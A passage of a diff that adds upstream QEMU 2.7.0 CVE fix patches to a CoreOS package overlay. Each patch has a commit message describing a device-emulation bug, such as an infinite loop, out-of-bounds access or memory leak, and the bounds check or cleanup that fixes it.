b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7156.patch @@ -0,0 +1,62 @@ +From: Prasad J Pandit + +In PVSCSI paravirtual SCSI bus, pvscsi_convert_sglist can take a very +long time or go into an infinite loop due to two different bugs: + +1) the request descriptor data length is defined to be 64 bit. While +building SG list from a request descriptor, it gets truncated to 32bit +in routine 'pvscsi_convert_sglist'. This could lead to an infinite loop +situation for large 'dataLen' values, when data_length is cast to uint32_t +and chunk_size becomes always zero. Fix this by removing the incorrect +cast. + +2) pvscsi_get_next_sg_elem can be called arbitrarily many times if the +element has a zero length. Get out of the loop early when this happens, +by introducing an upper limit on the number of SG list elements. + +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +--- + hw/scsi/vmw_pvscsi.c | 11 ++++++----- + 1 file changed, 6 insertions(+), 5 deletions(-) + +Update as per: + -> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg01172.html + +diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c +index 4245c15..babac5a 100644 +--- a/hw/scsi/vmw_pvscsi.c ++++ b/hw/scsi/vmw_pvscsi.c +@@ -40,6 +40,8 @@ + #define PVSCSI_MAX_DEVS (64) + #define PVSCSI_MSIX_NUM_VECTORS (1) + ++#define PVSCSI_MAX_SG_ELEM 2048 ++ + #define PVSCSI_MAX_CMD_DATA_WORDS \ + (sizeof(PVSCSICmdDescSetupRings)/sizeof(uint32_t)) + +@@ -628,17 +630,16 @@ pvscsi_queue_pending_descriptor(PVSCSIState *s, SCSIDevice **d, + static void + pvscsi_convert_sglist(PVSCSIRequest *r) + { +- int chunk_size; ++ uint32_t chunk_size, elmcnt = 0; + uint64_t data_length = r->req.dataLen; + PVSCSISGState sg = r->sg; +- while (data_length) { +- while (!sg.resid) { ++ while (data_length && elmcnt < PVSCSI_MAX_SG_ELEM) { ++ while (!sg.resid && elmcnt++ < PVSCSI_MAX_SG_ELEM) { + pvscsi_get_next_sg_elem(&sg); + trace_pvscsi_convert_sglist(r->req.context, r->sg.dataAddr, + r->sg.resid); + } +- assert(data_length > 0); +- chunk_size = MIN((unsigned) data_length, sg.resid); ++ chunk_size = MIN(data_length, sg.resid); + if (chunk_size) { + qemu_sglist_add(&r->sgl, sg.dataAddr, chunk_size); + } +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-1.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-1.patch new file mode 100644 index 0000000000..480de308e0 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-1.patch @@ -0,0 +1,28 @@ +From: Prasad J Pandit + +When LSI SAS1068 Host Bus emulator builds configuration page +headers, the format string used in 'mptsas_config_manufacturing_1' +was wrong. It could lead to an invalid memory access. + +Reported-by: Tom Victor +Fix-suggested-by: Paolo Bonzini +Signed-off-by: Prasad J Pandit +--- + hw/scsi/mptconfig.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c +index 7071854..1ec895b 100644 +--- a/hw/scsi/mptconfig.c ++++ b/hw/scsi/mptconfig.c +@@ -203,7 +203,7 @@ size_t mptsas_config_manufacturing_1(MPTSASState *s, uint8_t **data, int address + { + /* VPD - all zeros */ + return MPTSAS_CONFIG_PACK(1, MPI_CONFIG_PAGETYPE_MANUFACTURING, 0x00, +- "s256"); ++ "*s256"); + } + + static +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-2.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-2.patch new file mode 100644 index 0000000000..5e796086ae --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7157-2.patch @@ -0,0 +1,27 @@ +From: Prasad J Pandit + +When LSI SAS1068 Host Bus emulator builds configuration page +headers, mptsas_config_pack() asserts to check returned size +value is within limit of 256 bytes. Fix that assert expression. + +Suggested-by: Paolo Bonzini +Signed-off-by: Prasad J Pandit +--- + hw/scsi/mptconfig.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c +index 1ec895b..531947f 100644 +--- a/hw/scsi/mptconfig.c ++++ b/hw/scsi/mptconfig.c +@@ -158,7 +158,7 @@ static size_t mptsas_config_pack(uint8_t **data, const char *fmt, ...) + va_end(ap); + + if (data) { +- assert(ret < 256 && (ret % 4) == 0); ++ assert(ret / 4 < 256); + stb_p(*data + 1, ret / 4); + } + return ret; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7170.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7170.patch new file mode 100644 index 0000000000..7eb5f76dd1 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7170.patch @@ -0,0 +1,40 @@ +From: Prasad J Pandit + +When processing svga command DEFINE_CURSOR in vmsvga_fifo_run, +the computed BITMAP and PIXMAP size are checked against the +'cursor.mask[]' and 'cursor.image[]' array sizes in bytes. +Correct these checks to avoid OOB memory access. + +Reported-by: Qinghao Tang +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +--- + hw/display/vmware_vga.c | 12 +++++++----- + 1 file changed, 7 insertions(+), 5 deletions(-) + +diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c +index e51a05e..6599cf0 100644 +--- a/hw/display/vmware_vga.c ++++ b/hw/display/vmware_vga.c +@@ -676,11 +676,13 @@ static void vmsvga_fifo_run(struct vmsvga_state_s *s) + cursor.bpp = vmsvga_fifo_read(s); + + args = SVGA_BITMAP_SIZE(x, y) + SVGA_PIXMAP_SIZE(x, y, cursor.bpp); +- if (cursor.width > 256 || +- cursor.height > 256 || +- cursor.bpp > 32 || +- SVGA_BITMAP_SIZE(x, y) > sizeof cursor.mask || +- SVGA_PIXMAP_SIZE(x, y, cursor.bpp) > sizeof cursor.image) { ++ if (cursor.width > 256 ++ || cursor.height > 256 ++ || cursor.bpp > 32 ++ || SVGA_BITMAP_SIZE(x, y) ++ > sizeof(cursor.mask) / sizeof(cursor.mask[0]) ++ || SVGA_PIXMAP_SIZE(x, y, cursor.bpp) ++ > sizeof(cursor.image) / sizeof(cursor.image[0])) { + goto badcmd; + } + +-- +2.5.5 + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7421.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7421.patch new file mode 100644 index 0000000000..b9f354537a --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7421.patch @@ -0,0 +1,34 @@ +From: Prasad J Pandit + +Vmware Paravirtual SCSI emulator while processing IO requests +could run into an infinite loop if 'pvscsi_ring_pop_req_descr' +always returned positive value. Limit IO loop to the ring size. + +Cc: address@hidden +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +Message-Id: +Signed-off-by: Paolo Bonzini +--- + hw/scsi/vmw_pvscsi.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c +index babac5a..a5ce7de 100644 +--- a/hw/scsi/vmw_pvscsi.c ++++ b/hw/scsi/vmw_pvscsi.c +@@ -247,8 +247,11 @@ static hwaddr + pvscsi_ring_pop_req_descr(PVSCSIRingInfo *mgr) + { + uint32_t ready_ptr = RS_GET_FIELD(mgr, reqProdIdx); ++ uint32_t ring_size = PVSCSI_MAX_NUM_PAGES_REQ_RING ++ * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE; + +- if (ready_ptr != mgr->consumed_ptr) { ++ if (ready_ptr != mgr->consumed_ptr ++ && ready_ptr - mgr->consumed_ptr < ring_size) { + uint32_t next_ready_ptr = + mgr->consumed_ptr++ & mgr->txr_len_mask; + uint32_t next_ready_page = +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7422.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7422.patch new file mode 100644 index 0000000000..6368e7f7e7 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7422.patch @@ -0,0 +1,38 @@ +From: Prasad J Pandit + +virtio back end uses set of buffers to facilitate I/O operations. +If its size is too large, 'cpu_physical_memory_map' could return +a null address. This would result in a null dereference +while un-mapping descriptors. Add check to avoid it. + +Reported-by: Qinghao Tang +Signed-off-by: Prasad J Pandit +--- + hw/virtio/virtio.c | 10 ++++++---- + 1 file changed, 6 insertions(+), 4 deletions(-) + +diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c +index 15ee3a7..0a4c5b6 100644 +--- a/hw/virtio/virtio.c ++++ b/hw/virtio/virtio.c +@@ -472,12 +472,14 @@ static void virtqueue_map_desc(unsigned int *p_num_sg, hwaddr *addr, struct iove + } + + iov[num_sg].iov_base = cpu_physical_memory_map(pa, &len, is_write); +- iov[num_sg].iov_len = len; +- addr[num_sg] = pa; ++ if (iov[num_sg].iov_base) { ++ iov[num_sg].iov_len = len; ++ addr[num_sg] = pa; + ++ pa += len; ++ num_sg++; ++ } + sz -= len; +- pa += len; +- num_sg++; + } + *p_num_sg = num_sg; + } +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7423.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7423.patch new file mode 100644 index 0000000000..fdd871b162 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7423.patch @@ -0,0 +1,31 @@ +From: Li Qiang + +When processing IO request in mptsas, it uses g_new to allocate +a 'req' object. If an error occurs before 'req->sreq' is +allocated, It could lead to an OOB write in mptsas_free_request +function. Use g_new0 to avoid it. + +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +Message-Id: +Cc: address@hidden +Signed-off-by: Paolo Bonzini +--- + hw/scsi/mptsas.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c +index 0e0a22f..eaae1bb 100644 +--- a/hw/scsi/mptsas.c ++++ b/hw/scsi/mptsas.c +@@ -304,7 +304,7 @@ static int mptsas_process_scsi_io_request(MPTSASState *s, + goto bad; + } + +- req = g_new(MPTSASRequest, 1); ++ req = g_new0(MPTSASRequest, 1); + QTAILQ_INSERT_TAIL(&s->pending, req, next); + req->scsi_io = *scsi_io; + req->dev = s; +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7466.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7466.patch new file mode 100644 index 0000000000..d5028bb168 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7466.patch @@ -0,0 +1,26 @@ +From: Li Qiang + +If the xhci uses msix, it doesn't free the corresponding +memory, thus leading a memory leak. This patch avoid this. + +Signed-off-by: Li Qiang +--- + hw/usb/hcd-xhci.c | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c +index 188f954..281a2a5 100644 +--- a/hw/usb/hcd-xhci.c ++++ b/hw/usb/hcd-xhci.c +@@ -3709,8 +3709,7 @@ static void usb_xhci_exit(PCIDevice *dev) + /* destroy msix memory region */ + if (dev->msix_table && dev->msix_pba + && dev->msix_entry_used) { +- memory_region_del_subregion(&xhci->mem, &dev->msix_table_mmio); +- memory_region_del_subregion(&xhci->mem, &dev->msix_pba_mmio); ++ msix_uninit(dev, &xhci->mem, &xhci->mem); + } + + usb_bus_release(&xhci->bus); +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7907.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7907.patch new file mode 100644 index 0000000000..34b095a513 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7907.patch @@ -0,0 +1,45 @@ +From: Prasad J Pandit + +i.MX Fast Ethernet Controller uses buffer descriptors to manage +data flow to/fro receive & transmit queues. While transmitting +packets, it could continue to read buffer descriptors if a buffer +descriptor has length of zero and has crafted values in bd.flags. +Set an upper limit to number of buffer descriptors. + +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +--- + hw/net/imx_fec.c | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +Update per + -> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg05284.html + +diff --git a/hw/net/imx_fec.c b/hw/net/imx_fec.c +index 1c415ab..1d74827 100644 +--- a/hw/net/imx_fec.c ++++ b/hw/net/imx_fec.c +@@ -220,6 +220,8 @@ static const VMStateDescription vmstate_imx_eth = { + #define PHY_INT_PARFAULT (1 << 2) + #define PHY_INT_AUTONEG_PAGE (1 << 1) + ++#define IMX_MAX_DESC 1024 ++ + static void imx_eth_update(IMXFECState *s); + + /* +@@ -402,12 +404,12 @@ static void imx_eth_update(IMXFECState *s) + + static void imx_fec_do_tx(IMXFECState *s) + { +- int frame_size = 0; ++ int frame_size = 0, descnt = 0; + uint8_t frame[ENET_MAX_FRAME_SIZE]; + uint8_t *ptr = frame; + uint32_t addr = s->tx_descriptor; + +- while (1) { ++ while (descnt++ < IMX_MAX_DESC) { + IMXFECBufDesc bd; + int len; + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7908.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7908.patch new file mode 100644 index 0000000000..16d072fe79 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7908.patch @@ -0,0 +1,52 @@ +From 070c4b92b8cd5390889716677a0b92444d6e087a Mon Sep 17 00:00:00 2001 +From: Prasad J Pandit +Date: Thu, 22 Sep 2016 16:02:37 +0530 +Subject: [PATCH] net: mcf: limit buffer descriptor count + +ColdFire Fast Ethernet Controller uses buffer descriptors to manage +data flow to/fro receive & transmit queues. While transmitting +packets, it could continue to read buffer descriptors if a buffer +descriptor has length of zero and has crafted values in bd.flags. +Set upper limit to number of buffer descriptors. + +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +Reviewed-by: Paolo Bonzini +Signed-off-by: Jason Wang +--- + hw/net/mcf_fec.c | 5 +++-- + 1 files changed, 3 insertions(+), 2 deletions(-) + +diff --git a/hw/net/mcf_fec.c b/hw/net/mcf_fec.c +index 0ee8ad9..d31fea1 100644 +--- a/hw/net/mcf_fec.c ++++ b/hw/net/mcf_fec.c +@@ -23,6 +23,7 @@ do { printf("mcf_fec: " fmt , ## __VA_ARGS__); } while (0) + #define DPRINTF(fmt, ...) do {} while(0) + #endif + ++#define FEC_MAX_DESC 1024 + #define FEC_MAX_FRAME_SIZE 2032 + + typedef struct { +@@ -149,7 +150,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s) + uint32_t addr; + mcf_fec_bd bd; + int frame_size; +- int len; ++ int len, descnt = 0; + uint8_t frame[FEC_MAX_FRAME_SIZE]; + uint8_t *ptr; + +@@ -157,7 +158,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s) + ptr = frame; + frame_size = 0; + addr = s->tx_descriptor; +- while (1) { ++ while (descnt++ < FEC_MAX_DESC) { + mcf_fec_read_bd(&bd, addr); + DPRINTF("tx_bd %x flags %04x len %d data %08x\n", + addr, bd.flags, bd.length, bd.data); +-- +1.7.0.4 + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7909.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7909.patch new file mode 100644 index 0000000000..8e6ecff892 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7909.patch @@ -0,0 +1,32 @@ +From: Prasad J Pandit + +The AMD PC-Net II emulator has set of control and status(CSR) +registers. Of these, CSR76 and CSR78 hold receive and transmit +descriptor ring length respectively. This ring length could range +from 1 to 65535. Setting ring length to zero leads to an infinite +loop in pcnet_rdra_addr. Add check to avoid it. + +Reported-by: Li Qiang +Signed-off-by: Prasad J Pandit +--- + hw/net/pcnet.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c +index 198a01f..3078de8 100644 +--- a/hw/net/pcnet.c ++++ b/hw/net/pcnet.c +@@ -1429,8 +1429,11 @@ static void pcnet_csr_writew(PCNetState *s, uint32_t rap, uint32_t new_value) + case 47: /* POLLINT */ + case 72: + case 74: ++ break; + case 76: /* RCVRL */ + case 78: /* XMTRL */ ++ val = (val > 0) ? val : 512; ++ break; + case 112: + if (CSR_STOP(s) || CSR_SPND(s)) + break; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-1.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-1.patch new file mode 100644 index 0000000000..6fe77f367d --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-1.patch @@ -0,0 +1,25 @@ +From: Li Qiang + +In virtio gpu resource create dispatch, if the pixman format is zero +it doesn't free the resource object allocated previously. Thus leading +a host memory leak issue. This patch avoid this. + +Signed-off-by: Li Qiang +--- + hw/display/virtio-gpu.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/hw/display/virtio-gpu.c b/hw/display/virtio-gpu.c +index 7fe6ed8..5b6d17b 100644 +--- a/hw/display/virtio-gpu.c ++++ b/hw/display/virtio-gpu.c +@@ -333,6 +333,7 @@ static void virtio_gpu_resource_create_2d(VirtIOGPU *g, + qemu_log_mask(LOG_GUEST_ERROR, + "%s: host couldn't handle guest format %d\n", + __func__, c2d.format); ++ g_free(res); + cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER; + return; + } +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-2.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-2.patch new file mode 100644 index 0000000000..dce1b2b2a3 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-7994-2.patch @@ -0,0 +1,26 @@ +From: Li Qiang + +While processing isochronous transfer descriptors(iTD), if the page +select(PG) field value is out of bands it will return. In this +situation the ehci's sg list doesn't be freed thus leading a memory +leak issue. This patch avoid this. + +Signed-off-by: Li Qiang +--- + hw/usb/hcd-ehci.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c +index b093db7..f4ece9a 100644 +--- a/hw/usb/hcd-ehci.c ++++ b/hw/usb/hcd-ehci.c +@@ -1426,6 +1426,7 @@ static int ehci_process_itd(EHCIState *ehci, + if (off + len > 4096) { + /* transfer crosses page border */ + if (pg == 6) { ++ qemu_sglist_destroy(&ehci->isgl); + return -1; /* avoid page pg + 1 */ + } + ptr2 = (itd->bufptr[pg + 1] & ITD_BUFPTR_MASK); +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8576.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8576.patch new file mode 100644 index 0000000000..9617cd5dc8 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8576.patch @@ -0,0 +1,61 @@ +From 20009bdaf95d10bf748fa69b104672d3cfaceddf Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann +Date: Fri, 7 Oct 2016 10:15:29 +0200 +Subject: [PATCH] xhci: limit the number of link trbs we are willing to process + +Signed-off-by: Gerd Hoffmann +--- + hw/usb/hcd-xhci.c | 10 ++++++++++ + 1 file changed, 10 insertions(+) + +diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c +index 726435c..ee4fa48 100644 +--- a/hw/usb/hcd-xhci.c ++++ b/hw/usb/hcd-xhci.c +@@ -54,6 +54,8 @@ + * to the specs when it gets them */ + #define ER_FULL_HACK + ++#define TRB_LINK_LIMIT 4 ++ + #define LEN_CAP 0x40 + #define LEN_OPER (0x400 + 0x10 * MAXPORTS) + #define LEN_RUNTIME ((MAXINTRS + 1) * 0x20) +@@ -1000,6 +1002,7 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb, + dma_addr_t *addr) + { + PCIDevice *pci_dev = PCI_DEVICE(xhci); ++ uint32_t link_cnt = 0; + + while (1) { + TRBType type; +@@ -1026,6 +1029,9 @@ static TRBType xhci_ring_fetch(XHCIState *xhci, XHCIRing *ring, XHCITRB *trb, + ring->dequeue += TRB_SIZE; + return type; + } else { ++ if (++link_cnt > TRB_LINK_LIMIT) { ++ return 0; ++ } + ring->dequeue = xhci_mask64(trb->parameter); + if (trb->control & TRB_LK_TC) { + ring->ccs = !ring->ccs; +@@ -1043,6 +1049,7 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring) + bool ccs = ring->ccs; + /* hack to bundle together the two/three TDs that make a setup transfer */ + bool control_td_set = 0; ++ uint32_t link_cnt = 0; + + while (1) { + TRBType type; +@@ -1058,6 +1065,9 @@ static int xhci_ring_chain_length(XHCIState *xhci, const XHCIRing *ring) + type = TRB_TYPE(trb); + + if (type == TR_LINK) { ++ if (++link_cnt > TRB_LINK_LIMIT) { ++ return -length; ++ } + dequeue = xhci_mask64(trb.parameter); + if (trb.control & TRB_LK_TC) { + ccs = !ccs; +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8577.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8577.patch new file mode 100644 index 0000000000..8c295802c8 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8577.patch @@ -0,0 +1,34 @@ +From: Li Qiang + +In 9pfs read dispatch function, it doesn't free two QEMUIOVector +object thus causing potential memory leak. This patch avoid this. + +Signed-off-by: Li Qiang +--- + hw/9pfs/9p.c | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 119ee58..543a791 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -1826,14 +1826,15 @@ static void v9fs_read(void *opaque) + if (len < 0) { + /* IO error return the error */ + err = len; +- goto out; ++ goto out_free_iovec; + } + } while (count < max_count && len > 0); + err = pdu_marshal(pdu, offset, "d", count); + if (err < 0) { +- goto out; ++ goto out_free_iovec; + } + err += offset + count; ++out_free_iovec: + qemu_iovec_destroy(&qiov); + qemu_iovec_destroy(&qiov_full); + } else if (fidp->fid_type == P9_FID_XATTR) { +-- +1.8.3.1 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8578.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8578.patch new file mode 100644 index 0000000000..74eee7e4d9 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8578.patch @@ -0,0 +1,58 @@ +From ba42ebb863ab7d40adc79298422ed9596df8f73a Mon Sep 17 00:00:00 2001 +From: Li Qiang +Date: Mon, 17 Oct 2016 14:13:58 +0200 +Subject: [PATCH] 9pfs: allocate space for guest originated empty strings + +If a guest sends an empty string paramater to any 9P operation, the current +code unmarshals it into a V9fsString equal to { .size = 0, .data = NULL }. + +This is unfortunate because it can cause NULL pointer dereference to happen +at various locations in the 9pfs code. And we don't want to check str->data +everywhere we pass it to strcmp() or any other function which expects a +dereferenceable pointer. + +This patch enforces the allocation of genuine C empty strings instead, so +callers don't have to bother. + +Out of all v9fs_iov_vunmarshal() users, only v9fs_xattrwalk() checks if +the returned string is empty. It now uses v9fs_string_size() since +name.data cannot be NULL anymore. + +Signed-off-by: Li Qiang +[groug, rewritten title and changelog, + fix empty string check in v9fs_xattrwalk()] +Signed-off-by: Greg Kurz +--- + fsdev/9p-iov-marshal.c | 2 +- + hw/9pfs/9p.c | 2 +- + 2 files changed, 2 insertions(+), 2 deletions(-) + +diff --git a/fsdev/9p-iov-marshal.c b/fsdev/9p-iov-marshal.c +index 663cad5..1d16f8d 100644 +--- a/fsdev/9p-iov-marshal.c ++++ b/fsdev/9p-iov-marshal.c +@@ -125,7 +125,7 @@ ssize_t v9fs_iov_vunmarshal(struct iovec *out_sg, int out_num, size_t offset, + str->data = g_malloc(str->size + 1); + copied = v9fs_unpack(str->data, out_sg, out_num, offset, + str->size); +- if (copied > 0) { ++ if (copied >= 0) { + str->data[str->size] = 0; + } else { + v9fs_string_free(str); +diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c +index 119ee58..39a7e1d 100644 +--- a/hw/9pfs/9p.c ++++ b/hw/9pfs/9p.c +@@ -3174,7 +3174,7 @@ static void v9fs_xattrwalk(void *opaque) + goto out; + } + v9fs_path_copy(&xattr_fidp->path, &file_fidp->path); +- if (name.data == NULL) { ++ if (!v9fs_string_size(&name)) { + /* + * listxattr request. Get the size first + */ +-- +2.7.3 + diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8668.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8668.patch new file mode 100644 index 0000000000..a27d3a6fb1 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8668.patch @@ -0,0 +1,30 @@ +From: Prasad J Pandit + +Rocker network switch emulator has test registers to help debug +DMA operations. While testing host DMA access, a buffer address +is written to register 'TEST_DMA_ADDR' and its size is written to +register 'TEST_DMA_SIZE'. When performing TEST_DMA_CTRL_INVERT +test, if DMA buffer size was greater than 'INT_MAX', it leads to +an invalid buffer access. Limit the DMA buffer size to avoid it. + +Reported-by: Huawei PSIRT +Signed-off-by: Prasad J Pandit +--- + hw/net/rocker/rocker.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/rocker/rocker.c b/hw/net/rocker/rocker.c +index 30f2ce4..e9d215a 100644 +--- a/hw/net/rocker/rocker.c ++++ b/hw/net/rocker/rocker.c +@@ -860,7 +860,7 @@ static void rocker_io_writel(void *opaque, hwaddr addr, uint32_t val) + rocker_msix_irq(r, val); + break; + case ROCKER_TEST_DMA_SIZE: +- r->test_dma_size = val; ++ r->test_dma_size = val & 0xFFFF; + break; + case ROCKER_TEST_DMA_ADDR + 4: + r->test_dma_addr = ((uint64_t)val) << 32 | r->lower32; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-1.patch b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-1.patch new file mode 100644 index 0000000000..457f022d59 --- /dev/null +++ b/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-1.patch @@ -0,0 +1,29 @@ +From: Prasad J Pandit + +The JAZZ RC4030 chipset emulator has a periodic timer and +associated interval reload register. The reload value is used +as divider when computing timer's next tick value. If reload +value is large, it could lead to divide by zero error. Limit +the interval reload value to avoid it. + +Reported-by: Huawei PSIRT +Signed-off-by: Prasad J Pandit +--- + hw/dma/rc4030.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/dma/rc4030.c b/hw/dma/rc4030.c +index 2f2576f..c1b4997 100644 +--- a/hw/dma/rc4030.c ++++ b/hw/dma/rc4030.c +@@ -460,7 +460,7 @@ static void rc4030_write(void *opaque, hwaddr addr, uint64_t data, + break; + /* Interval timer reload */ + case 0x0228: +- s->itr = val; ++ s->itr = val & 0x01FF; + qemu_irq_lower(s->timer_irq); + set_next_tick(s); + break; +-- +2.5.5 diff --git a/sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/files/qemu-2.7.0-CVE-2016-8669-2.patch 